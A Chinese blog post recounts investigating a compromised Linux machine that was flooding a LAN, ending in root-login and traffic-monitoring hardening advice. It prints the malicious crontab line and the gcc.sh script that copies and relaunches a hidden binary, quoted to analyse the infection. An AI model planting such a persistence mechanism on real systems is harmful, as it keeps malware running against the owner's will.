记一次Linux系统被入侵的过程

1. 前期现象

前期现象,宋组那边反应开发环境192.161.14.98这台机器通过公网下载文件,很慢,ping百度丢包严重。因为这台机器是通过楼下adsl拨号上网,于是连上去ping该网段网关(192.168.3.1),发现内网都丢包。

2.问题排查

2.1前期排查

2.1.1排查是不是14.98这台机器的问题

为排查是不是192.161.14.98这台机器的问题,通过发现抓包发现。Arp包、和广播包都比较比较多,考虑到是不是DOS攻击,然后在登录adsl开启ICMP泛洪、SYN泛洪、ARP攻击相关策略,重启adsl。在14.98这台机器上,ping 网关192.168.3.1,发现过一会儿丢包依然存在。为排除是不是14.98这台机器的问题,选择stage环境6.21这台机(该机器也是通过adsl上网的有一个192.168.3.0网段的IP)做测试,通过这台机器ping网关(192.168.3.1),发现丢包依然存在。

2.1.2排查可能不是14.98这台机器的问题

于是,就考虑到可能不是14.98这台机器的问题,考虑可能是通过adsl上网下载的机器占用带宽的问题(因为这个问题,在以前也遇到过,通过改内网网段,问题就解决了。)于是将192.168.3.0/24改成192.168.2.0/24,并修改了14.98和stage6.21这台机器的相应的能够上公网的ip。发现丢包现象停止。基本确认是有机器占用带宽导致这次问题。

2.2中期排查

为排除以后在出现此问题,影响工作。决定绑定主机mac地址,限制p2p流量,便于以后快速定位问题。

2.2.1开启dhcp服务器,定位通过adsl上网的主机都是哪些IP哪些mac地址,并配置mac过滤策略。如下图所示

2.2.2通过逐一排查定位主机

在切换策略的时候,定位到14.158这台机器有重大嫌疑。如果允许该主机上外网,丢包现象存在,如果限制该主机上网,丢包现象消失。

2.3后期排查

2.3.1通过抓包发现该主机arp包、广播包太多说明可能存在问题

2.3.2top命令查看异常进程

2.3.3查看该异常的连接

当时忘截图了,发现该进程的一个端口有一个法国IP连接存于established状态。

2.3.4查看该进程执行文件

2.3.4杀死该进程断网

发现该进程有死尔复生的功能,但是断网之后对网络带宽影响消失。断定可能本机有定时任务。

2.3.5排查定时任务

[root@www ~]# cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# |  .------------- hour (0 - 23)

# |  |  .---------- day of month (1 - 31)

# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...

# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# |  |  |  |  |

# *  *  *  *  * user-name command to be executed

*/3 * * * * root /etc/cron.hourly/gcc.sh

2.3.6定位循环执行的病毒体

[root@www ~]# cat  /etc/cron.hourly/gcc.sh

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done

cp /lib/libudev.so /lib/libudev.so.6

/lib/libudev.so.6

通过百度查出此病毒为臭名昭著的“十字符病毒”

2.3.7十字符病毒详解及其处理办法

请参考下面链接http://blog.csdn.net/fgf00/article/details/51388422

2.3.8查看病毒体源码

3.追踪被黑的原因

3.1查看最近登录本台机器的未能看到近期成功登录本机的记录怀疑已被抹除痕迹

3.2怀疑当初官网测试的时候,由于root密码太弱被暴力破解,注入此病毒。

3.3具体原因还需进一步研究。

4.造成危害

占用系统资源和占用带宽,导致局域网丢包严重。

5.解决办法

5.1杀死病毒请参考如下链接

http://blog.csdn.net/fgf00/article/details/51388422

5.2防范措施

5.2.1禁用root直接登录

5.2.2设置登录错误次数限定

5.2.3安装prtg软件,监控异常流量,便于快速定位问题

记一次Linux系统被入侵的过程的更多相关文章

  1. linux系统被入侵后处理经历【转】

    背景 操作系统:Ubuntu12.04_x64 运行业务:公司业务系统,爬虫程序,数据队列. 服务器托管在外地机房. 突然,频繁收到一组服务器ping监控不可达邮件,赶紧登陆zabbix监控系统查看流 ...

  2. 一次Linux系统被攻击的分析过程

    IT行业发展到现在,安全问题已经变得至关重要,从最近的“棱镜门”事件中,折射出了很多安全问题,信息安全问题已变得刻不容缓,而做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先 ...

  3. linux系统/sbin/init执行过程

    对于Linux的启动过程,之前一直都是研究到内核运行/sbin/init,启动第一个用户进程为止,因为这部分一直都是在内核态工作,所以对于学习内核还是有帮助的,当时/sbin/init之后的过程也需要 ...

  4. 我的Linux系统开始学习的过程

    Linux系统,不知大家是否了解.接触计算机不多或对计算机不感冒的人可能对其比较陌生,曾经的我也是.上大学前的我的确对Linux一无所知,那时候接触面窄,都没有听说过此名字,上了大学后,身边的人有学习 ...

  5. Linux系统被入侵后处理经历

    服务器托管在外地机房. 突然,频繁收到一组服务器ping监控不可达邮件,赶紧登陆zabbix监控系统查看流量状况. 可见流量已经达到了800M左右,肯定不正常,马上尝试SSH登陆系统,不幸的事,这种情 ...

  6. linux系统下nodejs安装过程随记

    首先下载适合的版本.这里我使用的是node v.10.36 先介绍编译安装的详细过程. 下载该版本: wget http://nodejs.org/dist/v0.10.36/node-v0.10.3 ...

  7. 记一次linux上的ftp搭建过程

    最近公司测试环境需要搭建ftp,正好自己稍微有点空且这方面确实不会,就自告奋勇说让我先试试,玩炸了你们再帮忙重装系统重新搭吧(手动滑稽),虽然最终是完成了,但是中间磕磕碰碰遇到一些小问题,到处查百度, ...

  8. 【转】阿里云Linux系统被攻击的处理过程

    4-22日 19:48分,在等女儿跳舞下课的时候,在“多看”进入大刘等人的<毁灭之城:地球碎块>,读到了“诅咒 3.0”病毒出现的时候,阿里云发来短信“尊敬的用户,您的云服务器x.x.x. ...

  9. Linux系统源码安装过程中的prefix选项

    在linux和unix环境中,源码安装是最常用的软件安装方式,一些软件除了提供源码外,也提供各种发行版的二进制安装包(如基于redhat包管理工具的rpm包),但强烈建议使用源码安装方式.原因是:(1 ...

随机推荐

  1. python 的多线程执行速度

    python 的多线程有点鸡肋,适用场景有局限,单位时间多个核只能跑一个线程. 有泳池一个,四个泵,但只有一个人,一人只能开启管理着其中一个,所以四个泵没什么用.但是,如果泵的工作时间与冷却恢复时间是 ...

  2. expect实现配置机器信任关系

    利用expect的交互功能,自动配置信任机器之间的信任关系. 代码里会判断机器是否生成了秘钥,如果没有生成过,则自动帮助你执行 ssh-keygen #!/bin/sh expect_ssh_copy ...

  3. SQL - 单引号和双引号的区别

    原文转载至:SQL中的单引号和双引号有区别吗? 在标准 SQL 中,字符串使用的是单引号. 如果字符串本身也包括单引号,则使用两个单引号(注意,不是双引号,字符串中的双引号不需要另外转义). 但在其它 ...

  4. Hexo瞎折腾系列(4) - 站点首页不显示文章全文

    文章摘要设置 打开主题配置文件 _config.yml 文件,找到如下: # Automatically Excerpt. Not recommend. # Please use <!-- mo ...

  5. python之unittest

    unittest是单元测试的一个框架 在说unittest之前,先说几个概念: TestCase 也就是测试用例 TestSuite 多个测试用例集合在一起,就是TestSuite TestLoade ...

  6. 【Helvetic Coding Contest 2018】B2. Maximum Control (medium)

    Description 传送门(翻译就别想了,本人英语太垃圾) Solution 设ans[i]为设置i个船时能控制的最多星球数(看到这你可能因为是dp,然而我可以很负责地告诉你是假的) 首先一个显然 ...

  7. 题解报告:hdu 2196 Computer(树形dp)

    Problem Description A school bought the first computer some time ago(so this computer's id is 1). Du ...

  8. fscanf

    fscanf (PHP 4 >= 4.0.1, PHP 5, PHP 7) fscanf — 从文件中格式化输入 说明 mixed fscanf ( resource $handle , str ...

  9. (027)[技术资料]业余制作Windows图标

    这几天一直在纠结一件事,想给软件制作一个简单的图标,以前(2014-10-4 11:00)制作的是下面这个,多重ICO,最大尺寸256,无压缩(windows允许图标尺寸在大于256时按PNG方式进行 ...

  10. python中函数参数

    默认参数注意点 优点:灵活,当没有指定与形参对应的实参时就会使用默认参数 缺陷: 例子: >>> def h(m, l=[]):                    #默认参数时列 ...